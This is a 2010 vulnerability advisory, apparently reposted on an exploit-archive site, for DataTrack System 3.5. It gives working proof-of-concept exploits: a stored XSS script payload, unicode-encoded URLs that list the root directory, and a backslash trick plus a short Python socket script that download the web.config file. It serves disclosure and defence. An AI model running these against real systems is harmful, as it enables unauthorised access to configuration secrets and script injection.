DataTrack System 3.5 persistent cross site scripting

2010-05-19 / 2010-05-20
Credit: John Leitch
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2010-2043 | CVE-2010-2078 | CVE-2010-2079
CWE: CWE-79

#============================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ # # ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ # # \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ # # )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ # # \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ # # # #============================================================================================================# # # # Vulnerability............Persistent Cross-Site Scripting # # Directory Disclosure # # Configuration Disclosure # # Source Disclosure # # Software.................DataTrack System 3.5 # # Download.................http://www.magnoware.com/Downloads.aspx # # Date.....................5/17/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # User submitted data is not HTML entity encoded before it is rendered. # # # # # # ##Exploit## # # # # Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate # # to My History to see the result. # # # #============================================================================================================# # # # ##Description## # # # # The contents of the root directory can be listed by using a specially crafted URL. # # # # # # ##Exploit## # # # # %u0085 # # %u00A0 # # # # # # ##Proof of Concept## # # # # http://localhost/%u0085/ # # http://localhost/%u00A0/ # # # #============================================================================================================# # # # ##Description## # # # # Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename. # # # # # # ##Exploit## # # # # GET /web.config\ HTTP/1.1 # # Host: localhost # # # # # # ##Proof of Concept## # # # import socket host ='localhost' port = 80 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send('GET /web.config\ HTTP/1.1\r\n'\ 'Host: ' + host + '\r\n\r\n') while 1: response = s.recv(8192) if not response: break print response

References:

http://xforce.iss.net/xforce/xfdb/58732
http://www.securityfocus.com/bid/40249
http://secunia.com/advisories/39868
http://packetstormsecurity.org/1005-exploits/datatrackserver35-xss.txt
http://osvdb.org/64727
http://cross-site-scripting.blogspot.com/2010/05/datatrack-system-35-persistent-xss.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top